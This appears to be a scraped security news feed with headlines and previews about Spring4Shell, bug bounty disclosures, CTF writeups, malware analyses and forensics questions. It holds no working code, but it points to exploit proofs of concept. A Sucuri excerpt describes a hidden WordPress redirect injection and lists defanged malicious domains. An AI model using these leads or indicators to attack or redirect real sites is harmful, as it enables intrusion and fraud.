    Dockerized Spring4Shell Exploit Proof of Concept
    submitted by /u/sciencestudent99 [link] [comments]
  • Open

    [api.krisp.ai] Race condition on /v2/seats endpoint allows bypassing the original seat limit
    Krisp disclosed a bug submitted by alp: https://hackerone.com/reports/1418419 - Bounty: $100
  • Open

    Log Poisoning — Inject payloads in logs
    No content preview
    TryHackMe writeup: Game Zone
    No content preview
  • Open

    Exploiting Insecure Docker Registry
    submitted by /u/tbhaxor [link] [comments]
    Dockerized Spring4Shell Exploit Proof of Concept
    https://github.com/FourCoreLabs/spring4shell-exploit-poc submitted by /u/sciencestudent99 [link] [comments]
  • Open

    Road to Go Pro — Special Edition: Fuzzing
    In this special edition, we are going to learn the new testing feature: fuzzing. I will share my thoughts on this feature in this story. Continue reading on Level Up Coding »
  • Open

    Vulnerability Excel template?
    I'm looking for a generic vulnerability register excel template to track risks within a number of products and some vulnerabilities outside of the products on the operational side of things. It seems like this should be a solved problem but Google isn't turning up any good results, any recommendations? We do have jira for when we want to actually schedule the work but due to the permissions setup and config I'd rather just keep that for work that is actively being worked on rather than cataloguing all vulnerabilities. submitted by /u/dbxp [link] [comments]
    Network support to security?
    Network Engineer to Security: I am a network engineer at Cisco CCNP level. I had my Security+ but it expired, and I've always been interested in security but never nerded out on Hack The Box or anything. I want to transition from network support / engineering to cyber security, but there are so many fields I'm having trouble. I know that since I have a deep background in core networking stuff, network security makes sense for me, so I'm wondering if OSCP is too app / Windows at an enterprise focused. I kind of just want to pick a well respected cert and do it to completion because I like following curriculums. I can learn on my own fine and don't mind cracking into a book, but I like the organized start-to-finish structure of certifications, where you walk away with something that shows your time and effort. I like the syllabus of PWK for the most part; I just don't know if there's a better path / course for me to take. I do meet all the prerequisites they say you need. My rough plan would be something like OSCP to transition from my current support role at a large network vendor for datacenter route/switch, then after 1-2 years in a real security role, CISSP then consulting / management. I currently make $98k in networking, do you guys think I can jump to 120-130k if I get OSCP? submitted by /u/bearlapa [link] [comments]
    Now what?
    Finishing up a 14-week cybersecurity bootcamp, passed my CySA+ and got a pending 6-12 month contract as a Junior Analyst. My foot is officially in the door and I’m excited to get some hands on experience. That said, what are some “next steps” I should be focusing on to study or work towards? What other options beyond PenTesting are there after you’ve put in your time as a SOC grunt sifting through logs? I’m eager to just be making the transition into CyberSec, but want to keep the momentum and drive going and I’m curious what sort of roadmap others might suggest. Thanks! submitted by /u/DirtyMetis [link] [comments]
  • Open

    A step-by-step analysis of the Russian Turla backdoor called TinyTurla
    submitted by /u/CyberMasterV [link] [comments]
  • Open

    SecWiki News 2022-04-03 Review
    Learning how to do security research from DARPA projects by ourren; Deceiving the Wappalyzer plugin's fingerprinting by tmr. For more recent articles, visit SecWiki
  • Open

    Downloading of YT videos with search criteria
    Does anyone have a suggestion for a quick solution to download videos with specific surname in title before they are taken down? After this massacre in Ukrainian town Bucha I am afraid some prominent people will want to remove evidence for their support of this war. There is a particular mathematician I would like the world to remember. Some of his videos are already gone. submitted by /u/Base88Decode [link] [comments]
  • Open

    Image & Geospatial OSINT
    No content preview
    API authentication bypass on National Informatics Centre
    No content preview
    Finding Vulnerable Info Using Google Dorks — Ethical Hacking
    No content preview
  • Open

    HACKED INSTAGRAM HANDLE OF SAMSUNG….
    Hello, Hackers Welcome Back to my Stored Link Hijacking Scenario... Continue reading on Medium »
    OOB & Blind Testing using DNS Exfiltration
    Previous: Private Burp Collaborator Continue reading on Medium »
    Albus Security Trainee Application
    Hi Medium folk, before We start I'll introduce myself, So I’m Aniket Tyagi and I’m an Information Technology officer at the 5f eco… Continue reading on Medium »
  • Open

    I'm trying to read some logs but almost all of them have these characters all throughout the logs. Why might this be the case and is there anyway of reading it in properly?
    submitted by /u/finnster145 [link] [comments]
    Windows Forensics Roadmap
    What is the best approach to learn and practice Windows forensics? Is there any effective roadmap including books, courses, practice website, etc… submitted by /u/BFF100F0 [link] [comments]
    Via the command line, can you search a forensic image and pull out files?
    Had some ideas to make life easier around the office. I wanted to use PowerShell (or software that is CMD based) to search an E01 file and pull out specific files in set locations. Effectively like any other GUI-based viewer such as FTK Imager (but via command line instead). I don't know of any software/scripts that allow me to do this. Any advice? An alternative is, I could auto-mount an E01 file with some software, and then search the mounted file system for artefacts in set locations such as prefetch files, then export them to my workstation. What do you think? Cheers! submitted by /u/GEAR-IT-UP [link] [comments]
  • Open

    Broken Domain Link Takeover from kubernetes.io docs
    Kubernetes disclosed a bug submitted by 0xlegendkiller: https://hackerone.com/reports/1434179 - Bounty: $100
  • Open

    Is there any good friendly conference for sharing security knowledge such as incident response or automation?
    As the title says, are there any good, friendly conferences suitable for sharing security knowledge such as security automation? (besides Black Hat and DEF CON) submitted by /u/Calm_Scene [link] [comments]
    How valuable is the Certificate of Cloud Security Knowledge (CCSK)?
    Hi, I have been working in the cybersecurity space for around 2 years now and have now decided to go for this cert: Certificate of Cloud Security Knowledge (CCSK) If and when I do complete the CCSK, how valuable will this be for future job prospects? Thanks submitted by /u/securm0n [link] [comments]
    Syn flooding one port?
    So I'm analyzing a Wireshark PCAP, and I'm dumbfounded as to what is going on; maybe someone here can help. I'm analyzing a lot of packets from one machine to another. These are the same machines over and over. It seems like one machine is targeting port 636 over TCP. It looks like an Nmap SYN scan, except that the initiating machine keeps changing the ports it uses while targeting one single port on the other machine. So it goes like this (X = random port):
      A:X [SYN] >> B:636
      B:636 [SYN, ACK] >> A:X
      A:X [ACK] >> B:636
      A:X [TLSv1 Client Hello] >> B:636
      B:636 [RST, ACK] >> A:X
    Then it will repeat, but X increments by 1. Anyone familiar with this type of pattern that can shed some light? I have no idea what this even is. I know port 636 is LDAP, but I can't figure out what the inquiring machine (A) is doing. I don't know any scans that actively target only one port. Anyway, any help is greatly appreciated. submitted by /u/Forsaken-Summer-4844 [link] [comments]
  • Open

    Introducing PacketStreamer - packet capture for Kubernetes and other platforms
    submitted by /u/foobarbazwibble [link] [comments]
    DoS vulnerability in firmware v3.0.3 of KNXnet/IP Secure router SCN-IP100.03
    submitted by /u/robertguetzkow [link] [comments]
  • Open

    Ukraine — Situation update as of April 3
    The last 24 hours Continue reading on Medium »
    War in Ukraine / April 1
    The Molfar team sends a daily newsletter about the war in Ukraine. You can subscribe to the newsletter by sending your email address to… Continue reading on Medium »
    Image & Geospatial OSINT
    In this article, I learn how to use Open Source Intelligence (OSINT) techniques and tools to gather information from image or video files… Continue reading on InfoSec Write-ups »
    How to identify fake photos and videos?
    I publish simple and free tools for verifying (checking) photographic and video content posted in the news. Continue reading on Medium »
    Search by nickname and username
    Today we will analyze the topic of checking nicknames in the process of OSINT research. Did you know that the average person usually has… Continue reading on Medium »
  • Open

    MULTIPLE TIMES I HACKED DUKE UNIVERSITY WITH RXSS VULNERABILITY!!!
    I’m Going to share one of my other Reflected Cross-Site Scripting Scenario. Continue reading on Medium »
    Design Flaw — A Tale of Permanent DOS
    This is my first writeup here on medium. Hope you enjoy it :). Feedbacks are always appreciated! Continue reading on Medium »
    Cross Site Scripting (XSS) for Dummies
    Hello everyone, my name is Кристиян Радев but many of you may know me as CypherTheThird. I have been studying ethical hacking for a while… Continue reading on Medium »
    Oceanland Testnet Bug Bounty Program
    Early bird catches the worm 🐛 Continue reading on Medium »
    SCENARIO OF REFLECTED CROSS-SITE SCRIPTING VULNERABILITY $$$$
    Today I’m going to share one of my RXSS Scenarios. Continue reading on Medium »
    Manager From Hackthebox
    Part Of Intro to Android Exploitation Continue reading on InfoSec Write-ups »
    View Friends List of any users using “View as” | Facebook Bug bounty
    Hello guys, Continue reading on Medium »
    (READ-PDF!) You’re My Little Cuddle Bug Full
    You're My Little Cuddle Bug Read Online Download Link => You're My Little Cuddle Bug Book Description Celebrate your little cuddle… Continue reading on Medium »
    Immunefi and the Stacks Foundation launch a bug bounty program
    Immunefi and the Stacks Foundation launch a bug bounty program. Continue reading on Medium »
  • Open

    Lots of NSFW videos. Lots.
    submitted by /u/brother_p [link] [comments]
  • Open

    Found a useful Open Source Security Guide
    submitted by /u/Khaotic_Kernel [link] [comments]
  • Open

    FTK Imager unavailable?
    I was going to download FTK imager today, but the download link on both accessdata.com and exterro.com are broken. I went to their Twitter to check if there was any info there, but @AccessDataGroup is suspended and no info on @exterro. What's going on? submitted by /u/Bulletorpedo [link] [comments]
    Help with identifying names of transferred files
    I am trying to identify exactly what files the attacker transferred from his work PC to his USB drive. I have access to the registry hives of the attacked machine and a vhdx file which I can mount and explore. The vhdx contains system logs in /System32/winevt/logs. Among those logs are Security.evtx, System.evtx and a bunch of others. I know the GUID of the USB that was used. The USB was encrypted with VeraCrypt. I know the drive letters under which the USB was connected to the machine. I am trying to find all files that exist or existed on this USB. I tried to analyze the Security.evtx file with Windows Event Viewer and filtered for ID numbers 4656, 4660, 4663, 4670, but with no success. What am I doing wrong and what would be your methodology? submitted by /u/threepairs [link] [comments]
    How do computer forensics people deal with amnesic systems like Tails?
    I used to use Tails when I lived in China because I was too cheap to get a VPN (I ended up getting one anyway because Tails is soooo slow). I still use it sometimes here back home in Sweden because it kind of makes me feel like a haxor. Tails is supposedly completely amnesic and leaves 0 trace on the system after you've used it and shut it down. In Sweden, you need "physical" evidence to convict someone of a cyber crime. Just having logs of a specific IP doing something is (as far as I know) not enough; you also need logs or files etc. on the suspect's computer proving that the person did what they did. For example, if they have tracked that a specific IP address is buying illegal drugs, they also need to find evidence on the suspect's computer of illegal activity. If Tails really is completely amnesic, would that not mean that it's impossible to convict Tails users of cyber crimes in countries with the same laws as Sweden unless you actually swat them and catch them in the act before they can shut it down? submitted by /u/CompoteDizzy [link] [comments]
  • Open

    RCE vulnerability with Java Spring framework (CVE-2022-22965)
    Article URL: https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement Comments URL: https://news.ycombinator.com/item?id=30890139 Points: 1 # Comments: 0
    How The Tables Have Turned: Analysis of Linux CVE-2022-10{15,16} in nf_tables
    Article URL: https://blog.dbouman.nl/2022/04/02/How-The-Tables-Have-Turned-CVE-2022-1015-1016/ Comments URL: https://news.ycombinator.com/item?id=30886025 Points: 1 # Comments: 0
  • Open

    Shibboleth writeup | HackTheBox
    Shibboleth writeup | HackTheBox Continue reading on Medium »
    Remotely Dumping Chrome Cookies…Revisited
    TL;DR Security researcher Ron Masas (twitter: @RonMasas) recently wrote a tool (chrome-bandit) that extracts saved password from… Continue reading on Medium »
  • Open

    SecWiki News 2022-04-02 Review
    Anonymity protection and countermeasures in cryptocurrency contract trading by ourren; The history of XNU virtual memory security by ourren. For more recent articles, visit SecWiki
  • Open

    CSRF token validation system is disabled on Stripe Dashboard
    Stripe disclosed a bug submitted by d_sharad: https://hackerone.com/reports/1483327 - Bounty: $2500
  • Open

    Advanced Docker Security
    No content preview
    Manager From Hackthebox
    No content preview
  • Open

    Beginning reverse engineering and exploitation
    Hello, I'm 21 years old and finishing my computer science university degree. I've always been fascinated by security and after having a look around, the two areas that intrigue me are reverse engineering/malware analysis and exploitation in general. The entry barriers in both these fields are very high and the learning curve is very steep. I've seen the pwn2own videos for exploitation and OALabs for malware analysis and, I have to admit it, I understood less than 5% of what they said, so it'll be a lot of work. I've done some research and I came up with a roadmap for reverse engineering/malware analysis: -C/C++ and Assembly (for asm I think it's best to start with a simple architecture, like MIPS, then move into x32/x64) -start writing small programs and reverse them using both a debugger/disassembler, learning about how they translate into assembly -learn about common malware techniques: unpacking, persistence techniques, process injection, obfuscation, building a sandbox, building a honeypot for capturing samples and so on. The problems start with exploitation; here I am completely lost. I was able to find some basic explanations and tutorials about buffer/heap overflows, integer overflow, double free, use after free, null pointer dereference. It seems however that going from theory to practice is very very hard. Another subject that goes hand in hand with exploitation is fuzzing, which of course I don't understand. Last thing, I've seen a blog post where someone was able to get code execution on a program using DLL sideloading; is this related to exploitation? What resources, courses, books, tips, tricks can I follow in order to get better and better in these two fields? Last but not least, English is not my mother tongue, sorry for any mistakes. Thanks for taking your time to read and for an eventual reply, have a good day ahead! submitted by /u/worldpwner [link] [comments]
  • Open

    Breaking: CSRC revises confidentiality and archive management rules for domestic enterprises listing overseas
    The Provisions comprise thirteen articles, further clarify enterprises' information security responsibilities, and give domestic enterprises and institutions clearer guidance on confidentiality and archive management during overseas securities offerings and listings.
    EU draft law adds security checks to all crypto transactions
    The European Parliament recently took a solid first step toward new anti-money-laundering legislation; the new proposal mainly targets cryptocurrency transactions.
    GitLab vulnerability allows attackers to take over user accounts
    GitLab disclosed a vulnerability, which has now been fixed.
    Wyze cameras had a major vulnerability that took nearly three years to fix
    Wyze Cam was found to have three serious security vulnerabilities; attackers exploiting them could execute arbitrary code, take full control of the camera, and access the video stored on the device.
    Jiege teaches you to extract IoCs from malicious Excel spreadsheets delivered by Emotet with Python
    Jiege teaches you to build a threat-intelligence extraction tool in Python: initial-stage macro Excel spreadsheets of the Emotet trojan
    IT services giant hit by ransomware attack, losses exceed $42 million
    A leading Spanish business process outsourcing (BPO) provider said a ransomware attack caused it losses of tens of millions of dollars.
  • Open

    XNU Virtual Memory Security: A Retrospective
    Author: Wang Tielei. Original link: https://mp.weixin.qq.com/s/Lj8c5PLzLGIfdBoDzairsQ 1 Introduction The virtual memory (VM) subsystem is a core foundational component of modern operating systems. It not only maintains the mapping between virtual addresses and physical memory, manages and schedules the use of physical memory, and gives programs a unified, transparent address space, but also isolates different execution environments and controls read, write and execute permissions on physical pages, making it the basis of system security...
    CVE-2022-26503 Veeam Agent for Microsoft Windows LPE
    Author: Y4er. Original link: https://y4er.com/post/cve-2022-26503-veeam-agent-for-microsoft-windows-lpe/ Following the previous post. Vulnerability analysis. Patch: Veeam.Common.Remoting.CSrvTcpChannelRegistration.CSrvTcpChannelRegistration(string, int, CSrvTc...
    CVE-2022-26500 Veeam Backup & Replication RCE
    Author: Y4er. Original link: https://y4er.com/post/cve-2022-26500-veeam-backup-replication-rce/ Saw another CVE blow up on Twitter; it looked like a pretty impressive bug, so I took a look. Official advisory: https://www.veeam.com/kb4288 The Veeam Distribution Service (TCP 9380 by default) all...
  • Open

    WordPress Popunder Malware Redirects to Scam Sites
    Over the last year we’ve seen an ongoing malware infection which redirects website visitors to scam sites. So far this year our monitoring has detected over 3,000 websites infected with this injection, and over 17,000 in total since we first detected it in March of 2021. The reported behaviour is always the same: after a few seconds of loading, the website redirects to a dodgy scam site. Checking the Payload: The malware is always injected into the active theme’s footer.php file, and contains obfuscated JavaScript after a long series of empty lines, no doubt trying to stay hidden. Once we de-obfuscate this we see the following excerpt of the malicious code. The attackers are frequently adjusting the injection ever so slightly, but we notice the same domains over and over again initiating the redirect: amads[.]fun techmarket[.]ink uads[.]shop 5[.]188[.]62[.]157 uads[.]live like-a-dating[.]top techmarket[.]ink. Source of Infection? Continue reading WordPress Popunder Malware Redirects to Scam Sites at Sucuri Blog.
  • Open

    LayerZero Security Update — April 2022
    If this past week has shown us anything, it’s that there is nothing more critical in this space than an absolute commitment to… Continue reading on LayerZero Official »
    Community-Owned Bug Bounties
    Hacks have become the new norm in crypto; from Twitter jokes about getting rugged, to sad posts about people losing their most prized… Continue reading on Medium »
    Small bugs are more dangerous than you think
    Chaining bugs for the win Continue reading on Medium »
    AlbusSec:- Penetration-List 05 Cross-Site-Scripting (XSS) — Part 2
    Hello everyone, I hope you liked our previous article, Cross-Site-Scripting (XSS) — Part 1. In that article, you learned about… Continue reading on Medium »
    My First RCE from N/A to Triaged (CVE-2021–3064)
    Hello hackers, my name is Vivek Kumar and I started my bug bounty journey 8 months ago. Let's get back to the RCE; it's gonna be a very short blog… Continue reading on Medium »
    Enter the Crow Games for the opportunity to earn NFTs!
    Complete some tasks, tell us about it, and join the Crow Clan! After our recent airdrop of the crow clan NFT we have decided to grow the… Continue reading on Medium »
    Ambassador World Cup 2022 CTF
    This CTF was fun and informative, and could help you develop your methods for finding security misconfigurations on websites. Continue reading on Medium »
  • Open

    Workspace configuration metadata disclosure
    Slack disclosed a bug submitted by kadusantiago: https://hackerone.com/reports/864489 - Bounty: $3500
    Subdomain Takeover on proxies.sifchain.finance pointing to vercel
    Sifchain disclosed a bug submitted by hrdfrdh: https://hackerone.com/reports/1487793 - Bounty: $100
    CVE-2022-24288: Apache Airflow: TWO RCEs in example DAGs
    Internet Bug Bounty disclosed a bug submitted by happyhacking123: https://hackerone.com/reports/1492896 - Bounty: $4000
  • Open

    Ukraine: Situation update as of April 2
    The last 24 hours Continue reading on Medium »
    Create Your Own Internet Archive — ArchiveBox
    Since 1996, the Internet Archive has been actively serving this purpose. What does it do? It keeps an archive of the things that were once found on… Continue reading on Medium »
    War in Ukraine / March 30
    The Molfar team sends a daily newsletter about the war in Ukraine. You can subscribe to the newsletter by sending your email address to… Continue reading on Medium »
    Logging network users in OSINT
    Logging or establishing information about the device and connection of an Internet user is an important part of the process of… Continue reading on Medium »
    Telltale Signs of Russian Disinformation
    A wave of #disinformation emerged since Russia invaded Ukraine. Part 1 of a guide on how to take examples apart with #OSINT Continue reading on Medium »
    How to extract information from PGP public keys
    In this post we will talk about how to extract information from a PGP public key. Continue reading on Medium »
    Find users by password and PGP key
    Today we’ll talk about how to identify an anonymous email user using a leaked password from it, as well as a PGP public key. Continue reading on Medium »
  • Open

    CVE-2017-16995 Ubuntu local privilege escalation test (arbitrary address read/write exploitation)
    The vulnerability exists in Linux kernels compiled with eBPF bpf(2) syscall support (CONFIG_BPF_SYSCALL) and is an arbitrary memory read/write vulnerability.
    lazysysadmin practice target
    Continuing with practice boxes today; this one isn't hard, but it took me a whole day and I feel like the author tricked me.
    Vulnerability notes: PDA and Anchor account validation, through the Jet Protocol arbitrary withdrawal vulnerability
    Several hacking incidents on Solana to date have been related to account validation problems; the SlowMist security team reminds Solana developers to rigorously audit their account structures.
    FreeBuf Morning Report | Russia used AcidRain to attack US Viasat; Wyze camera vulnerability allows access to video feeds
    SentinelLabs researchers found that US satellite communications provider Viasat suffered a cyberattack that disrupted service across Central and Eastern Europe.
    Knownsec Blockchain | March Security Monthly Report
    The number of security incidents in March set a new high for 2022, causing a shocking loss of over $700 million!
    Detailed penetration walkthrough of the Driftingblues-1 target machine
    Sharing a detailed penetration walkthrough of the Driftingblues-1 target machine for learning.
    Research on Java deserialization echo chains: engineering vulnerability detection
    Research on Java deserialization echo chains: engineering vulnerability detection, shared for learning.
    Anonymous claims to have breached Russian company Thozis, denies attacking Rosaviatsia
    The Anonymous hacker collective continues to conduct cyberattacks against Russian entities and foreign private companies operating in the country.
    Apple releases emergency patches to fix actively exploited zero-day vulnerabilities
    Apple recently released an emergency security patch to address two zero-day vulnerabilities actively exploited to compromise iPhones, iPads and Macs.
    WAFNinja: a penetration testing tool for bypassing WAFs
    When doing penetration testing, we inevitably run into being blocked by various WAFs.
    FreeBuf Weekly | Meta hiring a firm to attack TikTok raises data privacy concerns; Spring vulnerability patch released
    Happy weekend, FreeBufers! Below is this week's FreeBuf Weekly, in which we summarize and recommend the week's hot news, quality articles and handy tools so you don't miss any of this week's highlights. Hot news: 1. The China National Vulnerability Database (CNVD) catalogued the Spring Framework remote command execution vulnerability; security patch released. 2. A Facebook algorithm bug kept pushing bad content for half a year. 3. A long-form piece in The Washington Post criticized Meta for hiring a firm to attack TikTok, raising data privacy concerns. 4. WordPress sites hacked, ex...
    Draft standards including "Information security technology: Technical specification for trusted identity authentication of calling users based on cryptographic tokens" released for comment
    Drafts of four national standards have been released for nationwide public comment.
    Answers and explanations for a certain company's 2016 internship recruitment security technology exam
    Since I once took the Tencent recruitment security technology written exam, I'm leaving this record as a memento.
    OpenSSL infinite loop vulnerability affects QNAP NAS devices
    If exploited, the vulnerability would allow an attacker to carry out a denial-of-service attack.
    FBI investigated more than 100 ransomware variants
    The FBI has launched investigations into more than 100 different ransomware variants and found that many have been used in various ransomware campaigns.
    FreeBuf Morning Report | CNVD catalogues Spring vulnerability, patch released; Facebook algorithm bug persisted for half a year
    On March 30, the China National Vulnerability Database (CNVD) catalogued the Spring Framework remote command execution vulnerability (CNVD-2022-23942).
  • Open

    AD Series | DC Sync Attacks
    DCSync Attack is a type of “credential dumping” attack that makes use of commands present in Microsoft Directory Replication Service… Continue reading on Medium »
    Prologue to Red Hat hackers in Cyber Security
    What are Red Hat hackers or a Red Team? Continue reading on Medium »
    HackTheBox Delivery Writeup
    Hello, I want to share how I solved the HackTheBox Delivery box. This box is fun and easy. Continue reading on MII Cyber Security Consulting Services »
    HackTheBox Ready Writeup
    Hello, I want to share how I solved the HackTheBox Ready machine. This box kind of needs more research to analyze, and is fun. Continue reading on MII Cyber Security Consulting Services »
    HackTheBox — ScriptKiddie Writeup
    The first step is to run nmap to find the open ports, because the IP address 10.10.10.226 does not… Continue reading on MII Cyber Security Consulting Services »
    HackTheBox — Passage Writeup
    IP : 10.10.10.26 Continue reading on MII Cyber Security Consulting Services »
  • Open

    CVE 2022-22965 (Spring4Shell) Vulnerability
    On March 29, 2022, a security researcher with the handle p1n93r disclosed a Spring Framework remote code execution (RCE) vulnerability, which was archived by vx-underground. This vulnerability, known as Spring4Shell, affects applications that use JDK v9 or above that run Apache Tomcat as the Servlet Container in a WAR package and use dependencies of the... The post CVE 2022-22965 (Spring4Shell) Vulnerability appeared first on TrustedSec.
  • Open

    SecWiki News 2022-04-01 Review
    Chrome Zero-Day from North Korea by ourren; [Rootkit Research Series] Highly stealthy, highly persistent threats on the Windows platform by ourren; In-depth analysis of reflection attacks based on the OpenAFS file system by ourren; Thoughts on how to better present the value of red-blue exercises by ourren; B1txor20, a Linux backdoor using DNS tunneling, is spreading via the Log4j vulnerability by ourren; An overview of commercial digital certificate issuance and usage by ourren; Spring Cloud Function SpEL expression injection by ourren; CodeQL from 0 to 0.1 by ourren; Using CodeQL to find Java second-order deserialization by ourren; A K8s security beginner's primer by ourren; Malbox: a malware container target by ourren; "Understanding CodeQL in Depth": Finding vulnerabilities with CodeQL by ourren; Analyzing AOSP with CodeQL by ourren; A collection of Java in-memory webshell analyses by ourren; CVE-2021-29454: Smarty template injection analysis and reproduction by ourren; Machine learning systems: design and implementation by ourren; Projecting the "three-year" technology adoption trend for hybrid work security by ourren; A rough analysis of the LAPSUS$ attacks by ourren. For more of the latest articles, visit SecWiki
  • Open

    ZAP Structural Modifier
    If I had to pick the three most important things when looking for vulnerabilities, I'd probably choose understanding of the technology, understanding of the target, and a good sense for it. Of course there are many other important factors, but these three are what I feel most often at work. I bring this up because today's topic is closely tied to understanding the target. It's about ZAP, but I think Burp users can get plenty of inspiration from it too. ZAP Structural Modifier. Let's get started 🚀 Structural Modifier ZAP supports a feature called Structural Modifier that lets you modify the structure of the Site Tree.
  • Open

    Critical Gitlab vulnerability let attackers take over accounts
    Article URL: https://www.bleepingcomputer.com/news/security/critical-gitlab-vulnerability-lets-attackers-take-over-accounts/ Comments URL: https://news.ycombinator.com/item?id=30878924 Points: 197 # Comments: 36
    Report a security vulnerability as an ethical hacker
    Article URL: https://opencirt.com/hacking/report-security-vulnerability/ Comments URL: https://news.ycombinator.com/item?id=30877585 Points: 1 # Comments: 1
  • Open

    Hunting for Malicious Binaries and Backdoors in the Running Containers
    submitted by /u/tbhaxor
  • Open

    is PSP to be very worried?
    There are a lot of suspicions about AMD putting backdoors on their chips and it's concerning a lot of people. They are a security problem and can't be mitigated. My question is for people with actual knowledge: I want more information about the risks. I know it has full write/read access, it can see everything on the PC and it can be "remotely" manipulated. Note on remotely: it can mean many things. Does it collect any data in a telemetry fashion or was it reported to ping weird IPs? Does remote control need to be manually activated, or is it permanently active by default? Could it have any way to not depend on the internet, like sending info via radio? And essentially: is it suspected to be made for targeted attacks or global surveillance? It's essentially a backdoor on every modern computer so I can't be calm about it. This could be used for literally anything but few people know what. This is why I ask here: to see if someone with knowledge can give info about this threat. I am extremely cautious about privacy, which overlaps with security, and I thought this could be a direct compromise. One of my highest goals is reducing the amount of data sent to corps. My threat model focuses more on data-hungry corps and services which want to know every detail about you and potentially have direct impact over you. I do nothing illegal and live in a democratic EU country (Poland), and I am no one important enough to be individually targeted. So I asked because I don't really feel much of a risk of being finger-pointed by agencies, but I am about mass surveillance methods that affect every computer in the world. PSP knowing absolutely all my PC activity is a no-no. submitted by /u/gre4tynhrj
    Non-DNS or Non-Compliant DNS traffic on DNS port in UniFi UDM IPS
    I have been seeing this error "ET DNS Non-DNS or Non-Compliant DNS traffic on DNS port Reserved Bit Set" almost twice or three times a day. source: 192.168.107.92 : 49013 (port changes when alert is triggered) destination: 1.1.1.1 : 53 or sometimes 8.8.8.8 : 53 (my upstream dns in pihole) I have been trying my best to figure this one out but with no luck, could anyone please help or guide me on how to investigate this alert? some details: old_phone 192.168.107.79 new_phone 192.168.107.204 pihole_dns 192.168.107.92 I have started seeing this error a while back after enabling IPS, every time the source is my pihole which is used as a DNS for all network devices, when I try to match the traffic in pihole with the time the alert is triggered in UDM I always saw the same device "old_pho…
    Volunteer pentest/bug hunt program
    Hi! I am currently looking into possibilities to set up a volunteer pentest agreement or program. I am volunteering for an NGO which helps refugees and they would like to get a pentest for their website. At first I thought that's a no-brainer - just set up a profile at a bug bounty site. But that's not so easy, e.g. Bugcrowd does not allow completely private programs and requires minimum $20 rewards. We would like to keep legal costs to a minimum and wanted to avoid hiring an attorney to set up contracts, if there are other possibilities. We already have volunteering pentesters, they just wait for the legal green light to start. Any recommendations on that? submitted by /u/iiskierka
    Spring4Shell Detection
    https://github.com/west-wind/Spring4Shell-Detection If there are any other ways to detect it, please comment and let everybody know. submitted by /u/la_farfalla_
    Vulnerability Research or SOC?
    I'm about to graduate with my degree in Computer Science, with very minimal experience in cybersecurity. Right now it seems as though I may be given the opportunity to work either as a vulnerability researcher or as a SOC analyst, both junior roles where my respective seniors would help me figure things out as I transitioned into these roles. Which would you recommend as a first-experience career choice to start off with in cybersecurity? submitted by /u/justaguybye
  • Open

    Resources Search Engine for Infosec based on Ippsec.rocks
    submitted by /u/sarthaksaini
    Gaining code execution on the backend of the PEAR package manager
    submitted by /u/monoimpact
    How Go Mitigates Supply Chain Attacks
    submitted by /u/e-san55
    SpringShell Zero-Day Vulnerability: All You Need To Know
    submitted by /u/SRMish3
  • Open

    Passive-aggressive scan checks
    Here at PortSwigger, our goal is to enable the world to secure the web. Our scanner sits at the core of this value - quickly surfacing issues and vulnerabilities that may be present in a web applicati
  • Open

    Finding bugs that doesn’t exists
  • Open

    Spring has sprung: breaking down CVE-2022-22963/CVE-2022-22965
    Article URL: https://www.fastly.com/blog/spring-has-sprung-breaking-down-cve-2022-22963-and-spring4shell-cve-2022 Comments URL: https://news.ycombinator.com/item?id=30874271 Points: 1 # Comments: 0

  • Open

    GitLab Critical Security Release: 14.9.2, 14.8.5, and 14.7.7
    submitted by /u/0xmilan
    Critical Vulnerability in Spring Core: CVE-2022-22965 a.k.a. Spring4Shell
    submitted by /u/MiguelHzBz
    IDA plugin for finding constants used in conditional statements
    submitted by /u/Martypx00
    Conti-nuation: methods and techniques observed in operations post the leaks
    submitted by /u/digicat
    GitHub Cache Poisoning
    submitted by /u/BarakScribe
    SpringShell Detector - searches compiled code (JAR/WAR binaries) for potentially vulnerable web apps
    submitted by /u/SRMish3
    Pwning 3CX Phone Management Backends from the Internet
    submitted by /u/EnableSecurity
    Spring4Shell 0-day writeup and guidance
    submitted by /u/CraZyBob
  • Open

    CVE-2022-22965: Spring Core Remote Code Execution Vulnerability Exploited In the Wild (SpringShell)
    CVE-2022-22965, aka SpringShell, is a remote code execution vulnerability in the Spring Framework. We provide a root cause analysis and mitigations. The post CVE-2022-22965: Spring Core Remote Code Execution Vulnerability Exploited In the Wild (SpringShell) appeared first on Unit42.
  • Open

    Path of least Resistance
    Hello! I am a student finishing my master's in computer engineering and I also work as a consultant, doing DevOps and cloud infrastructure management. I am really interested in cyber and have focused my master's around security and networking. I have also done some free online courses on cyber security. I am trying to pitch to my superiors the idea of providing cyber security services to our clients, but since we do not have a cyber team, I was thinking about which area of cyber would be the "easiest" to start offering. submitted by /u/Ap0k4lips3
    What do you guys think about SSL ?
    Do you think Let's Encrypt auto 3-month renewal (with certbot) is worth it, or do I buy a Comodo or DigiCert cert? I am starting my own cybersecurity company as a contractor LLC, and will be building a website and also using an email based on that domain; can I use the SSL certificate for both? submitted by /u/Morpheus_mmg
    PoC available for CVE's
    Is there someplace where CVEs have a PoC-available status? I looked at Exploit-DB but they don't have anything for the Spring vuln and I'm wanting something that updates faster than that. Edit: I look at https://cvetrends.com/ and when a new CVE bubbles to the top, I would like to know if a PoC has been released for it. submitted by /u/rogueit
    USB WiFi with external antenna attachment, usable on Linux?
    What are decent USB WiFi devices that allow attaching an external antenna, and that can also run in monitor mode on Linux? I'd like to try the aircrack-ng attacks on my home network, which includes a number of wireless access points. I've got a TP-LINK TL-WN722N, but I think it isn't capable of doing the 5Mhz channels, which I'd like to try out. I don't have any Windows machines. submitted by /u/bediger4000
    Deciding between Varonis and Digital Guardian
    I'm in an org with a decent budget for tools, yet I am the only infosec analyst on staff, so I have limited time to spend on them. We currently have both Varonis and Digital Guardian deployed, though we are not fully leveraging either of them, and from a value perspective it may not make sense to renew them both as it currently stands. In my limited experience with them I see a lot of overlap with some unique characteristics for each, like the DG agent on endpoints being able to take a block action on data, versus some fairly nice behavior analysis through Varonis on user and group access with recommendations. Anyone familiar with either or both of these products have insights on how well they complement each other or if one can mostly supplant the other? submitted by /u/EnterNam0
    Internet-facing host (hypervisor) security question - setup
